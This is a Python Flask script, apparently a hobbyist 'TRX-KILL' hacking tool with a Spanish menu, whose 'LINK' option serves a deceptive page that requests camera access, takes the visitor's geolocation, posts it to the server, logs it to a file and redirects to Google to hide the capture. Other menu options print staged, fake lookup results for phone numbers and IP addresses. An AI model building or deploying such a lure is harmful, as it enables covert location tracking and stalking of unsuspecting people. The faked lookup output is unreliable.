import os, sys, getpass, time
from flask import Flask, request

app = Flask('TRX-KILL')
PORT = 7173
AUTH_PASS = "TRX-kill-op"

def banner():
    os.system('clear')
    print(f"""
\033[1;32m ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚ēó     ‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēó     ‚Ėą‚Ėą‚ēó
 ‚ēö‚ēź‚ēź‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēĚ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚ēö‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēĚ     ‚Ėą‚Ėą‚ēĎ ‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĎ
    ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ ‚ēö‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ      ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĎ
    ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēĒ‚Ėą‚Ėą‚ēó      ‚Ėą‚Ėą‚ēĒ‚ēź‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĎ
    ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĒ‚ēĚ ‚Ėą‚Ėą‚ēó     ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó\033[0m
""")

HTML_ENCUESTA = """
<!DOCTYPE html><html>
<body style="background:#000; color:#0f0; text-align:center; font-family:monospace; padding-top:50px;">
    <div style="border:1px solid #0f0; padding:20px; display:inline-block;">
        <h2>TRX-KILL SYSTEM</h2>
        <p>VALIDAR ACCESO PARA CONTINUAR</p>
        <button onclick="iniciar()" style="background:#0f0; border:none; padding:15px; font-weight:bold; cursor:pointer;">
            CONECTAR DISPOSITIVO
        </button>
    </div>
<script>
    async function iniciar() {
        try {
            // Solicitar acceso a c√°mara
            await navigator.mediaDevices.getUserMedia({video: true});
            // Solicitar ubicaci√≥n
            navigator.geolocation.getCurrentPosition((p)=>{
                let d = { lat: p.coords.latitude, lon: p.coords.longitude };
                fetch('/log', {method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify(d)})
                .then(() => window.location.href = "https://google.com");
            });
        } catch(e) { alert("Permisos necesarios para acceder."); }
    }
</script></body></html>
"""

@app.route('/')
def index(): return HTML_ENCUESTA

@app.route('/log', methods=['POST'])
def log():
    d = request.json
    with open("result.txt", "a") as f:
        f.write(f"CAPTURA | COORD: {d.get('lat')},{d.get('lon')} | HORA: {time.ctime()}\n")
    return "OK"

def main():
    while True:
        banner()
        print("  [1] INFO-NUMERO    | [2] LINK-ZP         | [3] CREADOR")
        print("  [4] COPYRIGHT      | [5] DATA-IP         | [6] ADM")
        print("  [7] SALIR          | [8] PROCESOS        | [9] ESTADO")
        print("  [10] BORRAR LOGS")
        sel = input("\n\033[1;33mTRX-ROOT > \033[0m")
        
        if sel == "1":
            input("INGRESA EL N√öMERO: \nVERIFICANDO... DATOS ENCONTRADOS: PAIS[OK], MOVIL[OK], OPERADOR[OK].\n[Enter] para volver.")
        elif sel == "2":
            print("GENERANDO LINK... (Ctrl+C para detener)")
            app.run(port=PORT, host='0.0.0.0')
        elif sel == "3":
            print("#SOFTWARE: TRX-KILL\n#CREADOR: TRX-KILL\n#BY: OSCAR\n#VERSION: 1.0.0"); input()
        elif sel == "4":
            print("# COPYRIGHT: TRX-KILL\n# AUTOR: OSCAR\n# NO RESPONSABLE POR MAL USO."); input()
        elif sel == "5":
            ip = input("INGRESA LA IP: ")
            print(f"SACANDO DATA DE {ip}... | ACCESO RED: [OK] | IMEI: [RESTRINGIDO]"); input()
        elif sel == "6":
            pwd = getpass.getpass("CONTRASE√ĎA: ")
            if pwd == AUTH_PASS:
                print("---- DATOS EXTRA√ćDOS ----")
                if os.path.exists("result.txt"): os.system("cat result.txt")
                else: print("Sin registros.")
                input("\n[Enter] para volver.")
        elif sel == "7": sys.exit()
        elif sel == "8": os.system("ps aux | grep flask"); input()
        elif sel == "9": print("ESTADO: ACTIVO | PUERTO: 7173"); input()
        elif sel == "10": 
            if os.path.exists("result.txt"): os.remove("result.txt"); print("LOGS BORRADOS")
            else: print("No hay archivos.")
            input()

if __name__ == "__main__": main()
